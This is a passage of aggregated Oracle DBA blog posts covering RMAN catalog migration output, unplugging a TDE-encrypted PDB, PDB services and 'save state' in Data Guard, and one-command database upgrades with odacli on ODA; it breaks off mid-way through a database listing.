channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:26
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:27
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_ncsnf_TAG20180105T155117_f4z47glg_.bkp tag=TAG20180105T155117 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:01
Finished backup at 05/01/2018 15:51:27

Starting backup at 05/01/2018 15:51:27
current log archived
using channel ORA_DISK_1
channel ORA_DISK_1: starting archived log backup set
channel ORA_DISK_1: specifying archived log(s) in backup set
input archived log thread=1 sequence=37 RECID=6 STAMP=964626687
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:28
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:29
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_annnn_TAG20180105T155128_f4z47jn7_.bkp tag=TAG20180105T155128 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:01
Finished backup at 05/01/2018 15:51:29

 

Verifying backup set in new RCAT12c catalog.

oracle@vmtestoradg1:/u01/app/oracle/network/admin/ [RCAT12C] sqh
SQL*Plus: Release 12.2.0.1.0

SQL> select sysdate from dual;

SYSDATE
-------------------
05/01/2018 15:53:16

SQL> select DB_KEY, DB_ID, START_TIME, COMPLETION_TIME from RCAT.RC_BACKUP_SET;

    DB_KEY      DB_ID START_TIME          COMPLETION_TIME
---------- ---------- ------------------- -------------------
        42 3287252358 05/01/2018 11:32:00 05/01/2018 11:32:00
        42 3287252358 05/01/2018 11:32:02 05/01/2018 11:32:06
        42 3287252358 05/01/2018 11:32:09 05/01/2018 11:32:10
        42 3287252358 05/01/2018 11:32:12 05/01/2018 11:32:12
        42 3287252358 05/01/2018 15:33:37 05/01/2018 15:33:37
        42 3287252358 05/01/2018 15:33:40 05/01/2018 15:33:45
        42 3287252358 05/01/2018 15:33:47 05/01/2018 15:33:48
        42 3287252358 05/01/2018 15:33:50 05/01/2018 15:33:50
        42 3287252358 05/01/2018 15:51:16 05/01/2018 15:51:16
        42 3287252358 05/01/2018 15:51:18 05/01/2018 15:51:21
        42 3287252358 05/01/2018 15:51:25 05/01/2018 15:51:26
        42 3287252358 05/01/2018 15:51:28 05/01/2018 15:51:28
         2   65811618 05/01/2018 11:29:36 05/01/2018 11:29:36
         2   65811618 05/01/2018 11:29:38 05/01/2018 11:29:43
         2   65811618 05/01/2018 11:29:45 05/01/2018 11:29:46
         2   65811618 05/01/2018 11:29:48 05/01/2018 11:29:48
         2   65811618 05/01/2018 15:31:17 05/01/2018 15:31:17
         2   65811618 05/01/2018 15:31:19 05/01/2018 15:31:24
         2   65811618 05/01/2018 15:31:26 05/01/2018 15:31:27
         2   65811618 05/01/2018 15:31:29 05/01/2018 15:31:29
         2   65811618 05/01/2018 15:44:47 05/01/2018 15:44:47
         2   65811618 05/01/2018 15:44:49 05/01/2018 15:44:52
         2   65811618 05/01/2018 15:44:56 05/01/2018 15:44:57
         2   65811618 05/01/2018 15:45:00 05/01/2018 15:45:00
         2   65811618 05/01/2018 15:46:53 05/01/2018 15:46:53
         2   65811618 05/01/2018 15:46:55 05/01/2018 15:47:00
         2   65811618 05/01/2018 15:47:02 05/01/2018 15:47:03
         2   65811618 05/01/2018 15:47:05 05/01/2018 15:47:05

28 rows selected.

 

 

 

Cet article ORACLE 11g to 12c RMAN catalog migration est apparu en premier sur Blog dbi services.

Unplug an Encrypted PDB (ORA-46680: master keys of the container database must be exported)

$
0
0

In the Oracle Database Cloud DBaaS you provision a multitenant database where tablespaces are encrypted. This means that when you unplug/plug the pluggable databases, you also need to export /import the encryption keys. You cannot just copy the wallet because the wallet contains all CDB keys. Usually, you can be guided by the error messages, but this one needs a little explanation and an example.

Here I’ll unplug PDB6 from CDB1 and plug it into CDB2

[oracle@VM122 blogs]$ connect /@CDB1 as sysdba
SQLcl: Release 17.4.0 Production on Fri Jan 19 22:22:44 2018
Copyright (c) 1982, 2018, Oracle. All rights reserved.
Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
 
22:22:46 SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ ---------- ------------ ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
5 PDB6 READ WRITE NO

Here are the master keys:

SQL> select con_id,tag,substr(key_id,1,6)||'...' "KEY_ID...",creator,key_use,keystore_type,origin,creator_pdbname,activating_pdbname from v$encryption_keys;
 
CON_ID TAG KEY_ID... CREATOR KEY_USE KEYSTORE_TYPE ORIGIN CREATOR_PDBNAME ACTIVATING_PDBNAME
------ --- --------- ------- ------- ------------- ------ --------------- ------------------
1 cdb1 AcyH+Z... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL CDB$ROOT CDB$ROOT
3 pdb6 Adnhnu... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL PDB6 PDB6

Export keys and Unplug PDB

Let’s try to unplug PDB6:
22:22:51 SQL> alter pluggable database PDB6 close immediate;
Pluggable database PDB6 altered.
 
22:23:06 SQL> alter pluggable database PDB6 unplug into '/var/tmp/PDB6.xml';
 
Error starting at line : 1 in command -
alter pluggable database PDB6 unplug into '/var/tmp/PDB6.xml'
Error report -
ORA-46680: master keys of the container database must be exported

This message is not clear. You don’t export the container database (CDB) key. You have to export the PDB ones.

Then, I have to open the PDB, switch to it, and export the key:

SQL> alter session set container=PDB6;
Session altered.
 
SQL> administer key management set keystore open identified by "k3yCDB1";
Key MANAGEMENT succeeded.
 
SQL> administer key management
2 export encryption keys with secret "this is my secret password for the export"
3 to '/var/tmp/PDB6.p12'
4 identified by "k3yCDB1"
5 /
 
Key MANAGEMENT succeeded.

Note that I opened the keystore with a password. If you use an autologin wallet, you have to close it, in the CDB$ROOT, and open it with password.

Now I can unplug the database:

SQL> alter pluggable database PDB6 close immediate;
Pluggable database PDB6 altered.
 
SQL> alter pluggable database PDB6 unplug into '/var/tmp/PDB6.xml';
Pluggable database PDB6 altered.

Plug PDB and Import keys

I’ll plug it in CDB2:

SQL> connect /@CDB2 as sysdba
Connected.
SQL> create pluggable database PDB6 using '/var/tmp/PDB6.xml' file_name_convert=('/CDB1/PDB6/','/CDB2/PDB6/');
Pluggable database PDB6 created.

When I open it, I get a warning:

18:05:45 SQL> alter pluggable database PDB6 open;
ORA-24344: success with compilation error
24344. 00000 - "success with compilation error"
*Cause: A sql/plsql compilation error occurred.
*Action: Return OCI_SUCCESS_WITH_INFO along with the error code
 
Pluggable database PDB6 altered.

The PDB is opened in restricted mode and then I have to import the wallet:

SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ -------- ---- ---- ----------
2 PDB$SEED READ ONLY NO
6 PDB6 READ WRITE YES
 
SQL> select name,cause,type,status,message,action from pdb_plug_in_violations;
 
NAME CAUSE TYPE STATUS MESSAGE ACTION
---- ----- ---- ------ ------- ------
PDB6 Wallet Key Needed ERROR PENDING PDB needs to import keys from source. Import keys from source.

Then I open the destination CDB wallet and import the PDB keys into it:

SQL> alter session set container=PDB6;
Session altered.
 
SQL> administer key management set keystore open identified by "k3yCDB2";
Key MANAGEMENT succeeded.
 
SQL> administer key management
2 import encryption keys with secret "this is my secret password for the export"
3 from '/var/tmp/PDB6.p12'
4 identified by "k3yCDB2"
5 with backup
6 /
 
Key MANAGEMENT succeeded.

Now the PDB can be opened for all sessions

SQL> alter session set container=CDB$ROOT;
Session altered.
 
SQL> alter pluggable database PDB6 close;
Pluggable database PDB6 altered.
 
SQL> alter pluggable database PDB6 open;
Pluggable database PDB6 altered.

Here is a confirmation that the PDB has the same key as the in the origin CDB:

SQL> select con_id,tag,substr(key_id,1,6)||'...' "KEY_ID...",creator,key_use,keystore_type,origin,creator_pdbname,activating_pdbname from v$encryption_keys;
 
CON_ID TAG KEY_ID... CREATOR KEY_USE KEYSTORE_TYPE ORIGIN CREATOR_PDBNAME ACTIVATING_PDBNAME
------ --- --------- ------- ------- ------------- ------ --------------- ------------------
1 cdb2 AdTdo9... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL CDB$ROOT CDB$ROOT
4 pdb1 Adnhnu... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL PDB6 PDB6

 

Cet article Unplug an Encrypted PDB (ORA-46680: master keys of the container database must be exported) est apparu en premier sur Blog dbi services.


Multitenant, PDB, ‘save state’, services and standby databases

$
0
0

Creating – and using – your own services has always been the recommendation. You can connect to a database without a service name, though the instance SID, but this is not what you should do. Each database registers its db_unique_name as a service, and you can use it to connect, but it is always better to create your own application service(s). In multitenant, each PDB registers its name as a service, but the recommendation is still there: create your own services, and connect with your services.
I’ll show in this blog post what happens if you use the PDB name as a service and the standby database registers to the same listener as the primary database. Of course, you can workaround the non-unique service names by registering to different listeners. But this just hides the problem. The main reason to use services is to be independent from physical attributes, so being forced to assign a specific TCP/IP port is not better than using an instance SID.

I have the primary (CDB1) and standby (CDB2) databases registered to the default local listener:

LSNRCTL for Linux: Version 12.2.0.1.0 - Production on 03-FEB-2018 23:11:23
 
Copyright (c) 1991, 2016, Oracle. All rights reserved.
 
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=0.0.0.0)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias LISTENER
Version TNSLSNR for Linux: Version 12.2.0.1.0 - Production
Start Date 02-FEB-2018 09:32:30
Uptime 1 days 13 hr. 38 min. 52 sec
Trace Level off
Security ON: Local OS Authentication
SNMP OFF
Listener Parameter File /u01/app/oracle/product/12.2.0/dbhome_1/network/admin/listener.ora
Listener Log File /u01/app/oracle/diag/tnslsnr/VM122/listener/alert/log.xml
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=0.0.0.0)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=VM122)(PORT=5501))(Presentation=HTTP)(Session=RAW))
Services Summary...
Service "627f7512a0452fd4e0537a38a8c055c0" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "CDB1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1XDB" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1_CFG" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "CDB1_DGB" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1_DGMGRL" has 1 instance(s).
Instance "CDB1", status UNKNOWN, has 1 handler(s) for this service...
Service "CDB2" has 1 instance(s).
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "CDB2XDB" has 1 instance(s).
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "CDB2_DGB" has 1 instance(s).
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "CDB2_DGMGRL" has 1 instance(s).
Instance "CDB2", status UNKNOWN, has 1 handler(s) for this service...
Service "pdb1" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
The command completed successfully

Look at service ‘pdb1′, which is the name for my PDB. Connecting to //localhost:1521/PDB1 can connect you randomly to CDB1 (the primary database) or CDB2 (the standby database).

Here is an example, connecting several times to the PDB1 service:

[oracle@VM122 ~]$ for i in {1..5} ; do sqlplus -L -s sys/oracle@//localhost/pdb1 as sysdba <<< 'select name,open_mode,instance_name from v$instance , v$database;'; done
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ WRITE CDB1
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ ONLY WITH APPLY CDB2
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ WRITE CDB1
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ ONLY WITH APPLY CDB2
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ WRITE CDB1

I was connected at random to CDB1 or CDB2.

As an administrator, you know the instance names and you can connect to the one you want with: //localhost:1521/PDB1/CDB1 or //localhost:1521/PDB1/CDB2:

[oracle@VM122 ~]$ for i in {1..3} ; do sqlplus -L -s sys/oracle@//localhost/pdb1/CDB1 as sysdba <<< 'select name,open_mode,instance_name from v$instance , v$database;'; done
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ WRITE CDB1
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ WRITE CDB1
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ WRITE CDB1
 
[oracle@VM122 ~]$ for i in {1..3} ; do sqlplus -L -s sys/oracle@//localhost/pdb1/CDB2 as sysdba <<< 'select name,open_mode,instance_name from v$instance , v$database;'; done
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ ONLY WITH APPLY CDB2
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ ONLY WITH APPLY CDB2
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ ONLY WITH APPLY CDB2

Of course this is not what you want. And we must not start or stop the default services. For the application, the best you can do is to create your service. And if you want to be able to connect to the Active Data Guard standby, which is opened in read-only, then you can create a ‘read-write’ service and a ‘read-only’ service that you start depending on the role.

Create and Start a read-write service on the primary

This example supposes that you have only Oracle Database software installed. If you are in RAC, with the resources managed by Grid Infrastructure, or simply with Oracle Restart, creating a service is easy with srvctl, and you add it to a PDB with ‘-pdb’ and also with a role to start it automatically in the primary or in the standby. But without it, you use dbms_service:

SQL> connect /@CDB1 as sysdba
Connected.
 
SQL> alter session set container=pdb1;
Session altered.
 
SQL> exec dbms_service.create_service(service_name=>'pdb1_RW',network_name=>'pdb1_RW');
PL/SQL procedure successfully completed.
 
SQL> exec dbms_service.start_service(service_name=>'pdb1_RW');
PL/SQL procedure successfully completed.
 
SQL> alter session set container=cdb$root;
Session altered.

The service is created, stored in SERVICE$ visible with DBA_SERVICES:

SQL> select name,name_hash,network_name,creation_date,pdb from cdb_services order by con_id,service_id;
NAME NAME_HASH NETWORK_NAME CREATION_DATE PDB
---- --------- ------------ ------------- ---
pdb1_RW 3128030313 pdb1_RW 03-FEB-18 PDB1
pdb1 1888881990 pdb1 11-JAN-18 PDB1

Save state

I have created and started the PDB1_RW service. However, if I restart the database, the service will not start automatically. How do you ensure that the PDB1 pluggable database starts automatically when you open the CDB? You ‘save state’ when it is opened. It is the same for the services you create. You need to ‘save state’ when they are opened.


SQL> alter pluggable database all save state;
Pluggable database ALL altered.

The information is stored in PDB_SVC_STATE$, and I’m not aware of a dictionary view on it:

SQL> select name,name_hash,network_name,creation_date,con_id from v$active_services order by con_id,service_id;
 
NAME NAME_HASH NETWORK_NAME CREATION_DATE CON_ID
---- --------- ------------ ------------- ------
pdb1_RW 3128030313 pdb1_RW 03-FEB-18 4
pdb1 1888881990 pdb1 11-JAN-18 4
 
SQL> select * from containers(pdb_svc_state$);
 
INST_ID INST_NAME PDB_GUID PDB_UID SVC_HASH SPARE1 SPARE2 SPARE3 SPARE4 SPARE5 SPARE6 CON_ID
------- --------- -------- ------- -------- ------ ------ ------ ------ ------ ------ ------
1 CDB1 627F7512A0452FD4E0537A38A8C055C0 2872139986 3128030313 1

The name is not in this table, you have to join with v$services using(name_hash):

SQL> select name,name_hash,network_name,creation_date,con_id from v$active_services order by con_id,service_id;
 
NAME NAME_HASH NETWORK_NAME CREATION_DATE CON_ID
---- --------- ------------ ------------- ------
SYS$BACKGROUND 165959219 26-JAN-17 1
SYS$USERS 3427055676 26-JAN-17 1
CDB1_CFG 1053205690 CDB1_CFG 24-JAN-18 1
CDB1_DGB 184049617 CDB1_DGB 24-JAN-18 1
CDB1XDB 1202503288 CDB1XDB 11-JAN-18 1
CDB1 1837598021 CDB1 11-JAN-18 1
pdb1 1888881990 pdb1 11-JAN-18 4
pdb1_RW 3128030313 pdb1_RW 03-FEB-18 4

So, in addition to storing the PDB state in PDBSTATE$, visible with dba_pdb_saved_states, the service state is also stored. Note that they are at different level. PDBSTATE$ is a data link: stored on CDB$ROOT only (because the data must be read before opening the PDB) but PDB_SVC_STATE$ is a local table in the PDB as the services can be started only when the PDB is opened.

This new service is immediately registered on CDB1:

Service "pdb1" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "pdb1_RW" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
The command completed successfully

Create and Start a read-only service for the standby

If you try to do the same on the standby for a PDB1_RO service, you cannot because service information has to be stored in the dictionary:

SQL> exec dbms_service.create_service(service_name=>'pdb1_RO',network_name=>'pdb1_RO');
 
Error starting at line : 56 File @ /media/sf_share/122/blogs/pdb_svc_standby.sql
In command -
BEGIN dbms_service.create_service(service_name=>'pdb1_RO',network_name=>'pdb1_RO'); END;
Error report -
ORA-16000: database or pluggable database open for read-only access

So, the read-only service has to be created on the primary:

SQL> connect /@CDB1 as sysdba
Connected.
SQL> alter session set container=pdb1;
Session altered.
 
SQL> exec dbms_service.create_service(service_name=>'pdb1_RO',network_name=>'pdb1_RO');
 
SQL> select name,name_hash,network_name,creation_date,pdb from cdb_services order by con_id,service_id;
NAME NAME_HASH NETWORK_NAME CREATION_DATE PDB
---- --------- ------------ ------------- ---
pdb1_RW 3128030313 pdb1_RW 03-FEB-18 PDB1
pdb1_RO 1562179816 pdb1_RO 03-FEB-18 PDB1
pdb1 1888881990 pdb1 11-JAN-18 PDB1

The SERVICE$ dictionary table is replicated to the standby, so I can I can start it on the standby:

SQL> connect /@CDB2 as sysdba
Connected.
SQL> alter session set container=pdb1;
Session altered.
 
SQL> exec dbms_service.start_service(service_name=>'pdb1_RO');
PL/SQL procedure successfully completed.

Here is what is registered to the listener:

Service "pdb1" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "pdb1_RO" has 1 instance(s).
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "pdb1_RW" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
The command completed successfully

Now, the PDB_RO connects to the standby and PDB_RW to the primary. Perfect.

No ‘save state’ on the standby

At this point, you would like to have the PDB_RO started when PDB1 is opened on the standby, but ‘save state’ is impossible on a read-only database:

SQL> alter session set container=cdb$root;
Session altered.
 
SQL> alter pluggable database all save state;
 
Error starting at line : 84 File @ /media/sf_share/122/blogs/pdb_svc_standby.sql
In command -
alter pluggable database all save state
Error report -
ORA-16000: database or pluggable database open for read-only access

You can’t manage the state (open the PDB, start the services) in the standby database.

The primary ‘save state’ is replicated in standby

For the moment, everything is ok with my services:

Service "pdb1_RO" has 1 instance(s).
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "pdb1_RW" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...

If I restart the primary CDB1, everything is ok again because I saved the state of the PDB and the service. But what happens when the standby CDB2 restarts?


SQL> connect /@CDB2 as sysdba
Connected.
SQL> startup force;
...
SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
---------- ------------------------------ ---------- ----------
2 PDB$SEED READ ONLY NO
4 PDB1 MOUNTED

The PDB is not opened: the ‘saved state’ for PDB is not read in the standby.
However, when I open the PDB, it seems that the ‘saved state’ for service is applied, and this one is replicated from the primary:

SQL> alter pluggable database PDB1 open;
Pluggable database altered.
SQL> host lsnrctl status
...
Service "pdb1" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "pdb1_RW" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
The command completed successfully

My PDB1_RW is registered for both, connections will connect at random to the primary or the standby, and then the transactions will fail half of the times. It will be the same in case of switchover. This is not correct.

Save state instances=()

What I would like is the possibility to save state for a specific DB_UNIQUE_NAME, like with pluggable ‘spfile’ parameters. But this is not possible. What is possible is to mention an instance but you can use it only for the primary instance where you save the state (or you get ORA-65110: Invalid instance name specified) and anyway, this will not be correct after a switchover.

So what?

Be careful, with services and ensure that the services used by the application are registered only for the correct instance. Be sure that this persists when the instances are restarted. For this you must link a service name to a database role. This cannot be done correctly with ‘save state’. You can use startup triggers, or better, Grid Infrastructure service resources.

Do not connect to the default service with the PDB name, you cannot remove it and cannot stop it, so you may have the same name for different instances in a Data Guard configuration. You can register the standby instances to different local listeners, to avoid the confusion, but you may still register to the same SCAN listener.

Create your own services, start them depending on the database role, and do not use ‘save state’ in a physical standby configuration.

 

Cet article Multitenant, PDB, ‘save state’, services and standby databases est apparu en premier sur Blog dbi services.

One command database upgrade on ODA

$
0
0

The 12.2 finally arrived on ODA and is now available on all generations. Modern ODAs are now supporting 11.2.0.4, 12.1.0.2 and 12.2.0.1 database engines, and these 3 versions can work together without any problem.

You probably plan to upgrade some old databases to the latest engine, at least those still running on 11.2. As you may know, 11.2  is no more supported with premier support since January 2015: it’s time to think about an upgrade. Note that premier support for 12.1 will end in July 2018. Actually, running 11.2 and 12.1 databases will need extended support this year. And this extended support is not free, as you can imagine. There is still an exception for 11.2.0.4, Oracle is offering extended support to his customers until the end of 2018.

Database upgrades have always been a lot of work, and often paired with a platform change. You need to recreate the databases, the tablespaces, export and import the data with datapump, correct the problems, and so on. Sometimes you can restore the old database to the new server with RMAN, but it’s only possible if the old engine is supported on your brand new server/OS combination.

As ODA is a longer term platform, you can think about ugrading the database directly on the appliance. Few years ago you should have been using dbua or catupgr, but now latest ODA package is including a tool for one command database upgrade. Let’s try it!

odacli, the ODA Client Line Interface, has a new option: upgrade-database. Parameters are very limited:

[root@oda-dbi01 2018-02-19]# odacli upgrade-database -h
Usage: upgrade-database [options]
Options:
--databaseids, -i
Database IDs to be upgraded
Default: []
* --destDbHomeId, -to
DB HOME ID of the destination
--help, -h
get help
--json, -j
json output
--sourceDbHomeId, -from
DB HOME ID of the source

You need to provide the database identifier (ODA stores a repository of all databases, db homes, jobs in a JavaDB/DerbyDB database) and the destination db home identifier you want to upgrade to. The source db home id is optional as Oracle can determine it quite easily. There is no other option (for the moment): no pre-backup (advised) and no storage migration (switch between acfs and ASM) for example.

Imagine you have an 11.2.0.4 database you want to upgrade to 12.2.0.1. Look for the id of your database ODAWS11:

[root@oda-dbi01 2018-02-19]# odacli list-databases

ID                                       DB Name    DB Type  DB Version           CDB        Class    Shape    Storage    Status        DbHomeID
---------------------------------------- ---------- -------- -------------------- ---------- -------- -------- ---------- ------------ ----------------------------------------
45ce9de7-3115-45b0-97b0-1384b8401e69     ODAWS      Si       12.2.0.1             false      OLTP     odb2     ASM        Configured   1ca87df9-4691-47ed-90a9-2a794128539d
a948a32c-1cf2-42c8-88c6-88fd9463b297     DBTEST1    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
de281792-1904-4536-b42c-8a55df489b73     ODAWS11    Si       11.2.0.4             false      OLTP     odb2     ACFS       Configured   72023166-a39c-4a93-98b7-d552029b2eeaodacli create-dbhome -v 12.1.0.2.171017

Note that this database is configured with acfs, as 11.2 databases cannot be stored directly in an ASM 12c.

You can upgrade this database to an existing db home only: if you want to upgrade it to a new home, just create this new home, for example:

[root@oda-dbi01 2018-02-19]# odacli create-dbhome -v 12.1.0.2.171017

If you want to use an existing home, just pick the db home id, for example here the one used by ODAWS database.

Let’s do the upgrade:

[root@oda-dbi01 2018-02-19]# odacli upgrade-database -i de281792-1904-4536-b42c-8a55df489b73 -to 1ca87df9-4691-47ed-90a9-2a794128539d

{
"jobId" : "782e65fd-8b2b-4d16-a542-1f5b2b78d308",
"status" : "Created",
"message" : null,
"reports" : [ ],
"createTimestamp" : "February 19, 2018 17:40:58 PM CET",
"resourceList" : [ ],
"description" : "Database service upgrade with db ids: [de281792-1904-4536-b42c-8a55df489b73]",
"updatedTime" : "February 19, 2018 17:40:58 PM CET"
}

odacli will schedule a job for that, as for other operations. You can follow the job with describe-job:

[root@oda-dbi01 2018-02-19]# odacli describe-job -i 782e65fd-8b2b-4d16-a542-1f5b2b78d308

Job details
----------------------------------------------------------------
ID:  782e65fd-8b2b-4d16-a542-1f5b2b78d308
Description:  Database service upgrade with db ids: [de281792-1904-4536-b42c-8a55df489b73]
Status:  Running
Created:  February 19, 2018 5:40:58 PM CET
Message:

Task Name                                          Start Time                          End Time                            Status
-------------------------------------------------- ----------------------------------- ----------------------------------- ----------
Setting up ssh equivalance                         February 19, 2018 5:40:58 PM CET    February 19, 2018 5:40:58 PM CET    Success
Database Upgrade                                   February 19, 2018 5:40:58 PM CET    February 19, 2018 5:40:58 PM CET    Running

You can also look at the database alert.log file during the operation.

Be patient! Database upgrade is taking time, at least 20 minutes for an empty database. And it seems that other jobs planned during the upgrade are in waiting state (like a create-database for example).

[root@oda-dbi01 2018-02-19]# odacli describe-job -i 782e65fd-8b2b-4d16-a542-1f5b2b78d308

Job details
----------------------------------------------------------------
ID:  782e65fd-8b2b-4d16-a542-1f5b2b78d308
Description:  Database service upgrade with db ids: [de281792-1904-4536-b42c-8a55df489b73]
Status:  Running
Created:  February 19, 2018 5:40:58 PM CET
Message:

Task Name                                          Start Time                          End Time                            Status
-------------------------------------------------- ----------------------------------- ----------------------------------- ----------
Setting up ssh equivalance                         February 19, 2018 5:40:58 PM CET    February 19, 2018 5:40:58 PM CET    Success
Database Upgrade                                   February 19, 2018 5:40:58 PM CET    February 19, 2018 6:01:37 PM CET    Success

Now the upgrade seems OK, let’s check that:

su - oracle
. oraenv <<< ODAWS11
oracle@oda-dbi01:/home/oracle/ # sqlplus / as sysdba
SQL*Plus: Release 12.2.0.1.0 Production on Mon Feb 19 18:01:49 2018
Copyright (c) 1982, 2016, Oracle.  All rights reserved.

Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL> select instance_name, version from v$instance;

INSTANCE_NAME     VERSION
---------------- -----------------
ODAWS11      12.2.0.1.0

sho parameter spfile

NAME                 TYPE     VALUE
-------------------- -------- ---------------------------------------------------------------
spfile               string   /u01/app/oracle/product/12.2.0.1/dbhome_1/dbs/spfileODAWS11.ora

Even the spfile has been moved to new home, quite nice.

Let’s check the repository:

[root@oda-dbi01 ~]# odacli list-databases

ID                                       DB Name    DB Type  DB Version           CDB        Class    Shape    Storage    Status        DbHomeID
---------------------------------------- ---------- -------- -------------------- ---------- -------- -------- ---------- ------------ ----------------------------------------
45ce9de7-3115-45b0-97b0-1384b8401e69     ODAWS      Si       12.2.0.1             false      OLTP     odb2     ASM        Configured   1ca87df9-4691-47ed-90a9-2a794128539d
a948a32c-1cf2-42c8-88c6-88fd9463b297     DBTEST1    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
de281792-1904-4536-b42c-8a55df489b73     ODAWS11    Si       12.2.0.1             false      OLTP     odb2     ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d

Everything looks fine!

Now let’s test the upgrade with a 12.1 database, ODAWS12. This one is using ASM storage:

[root@oda-dbi01 ~]# odacli list-databases

ID                                       DB Name    DB Type  DB Version           CDB        Class    Shape    Storage    Status        DbHomeID
---------------------------------------- ---------- -------- -------------------- ---------- -------- -------- ---------- ------------ ----------------------------------------
45ce9de7-3115-45b0-97b0-1384b8401e69     ODAWS      Si       12.2.0.1             false      OLTP     odb2     ASM        Configured   1ca87df9-4691-47ed-90a9-2a794128539d
a948a32c-1cf2-42c8-88c6-88fd9463b297     DBTEST1    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
de281792-1904-4536-b42c-8a55df489b73     ODAWS11    Si       12.2.0.1             false      OLTP     odb2     ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
0276326c-cb6d-4246-9943-8289d29d6a4f     DBTEST2    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   7d2bbaa0-da3c-4455-abee-6bf4ff2d2630
24821a48-7474-4a8b-8f36-afca399b6def     ODAWS12    Si       12.1.0.2             false      OLTP     odb2     ASM        Configured   520167d7-59c8-4732-80a6-cc32ef745cec

[root@oda-dbi01 2018-02-19]# odacli upgrade-database -i 24821a48-7474-4a8b-8f36-afca399b6def -to 1ca87df9-4691-47ed-90a9-2a794128539d
{
"jobId" : "10a2a304-4e8e-4b82-acdc-e4c0aa8b21be",
"status" : "Created",
"message" : null,
"reports" : [ ],
"createTimestamp" : "February 19, 2018 18:36:17 PM CET",
"resourceList" : [ ],
"description" : "Database service upgrade with db ids: [24821a48-7474-4a8b-8f36-afca399b6def]",
"updatedTime" : "February 19, 2018 18:36:17 PM CET"
}

[root@oda-dbi01 ~]# odacli list-databases

ID                                       DB Name    DB Type  DB Version           CDB        Class    Shape    Storage    Status        DbHomeID
---------------------------------------- ---------- -------- -------------------- ---------- -------- -------- ---------- ------------ ----------------------------------------
45ce9de7-3115-45b0-97b0-1384b8401e69     ODAWS      Si       12.2.0.1             false      OLTP     odb2     ASM        Configured   1ca87df9-4691-47ed-90a9-2a794128539d
a948a32c-1cf2-42c8-88c6-88fd9463b297     DBTEST1    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
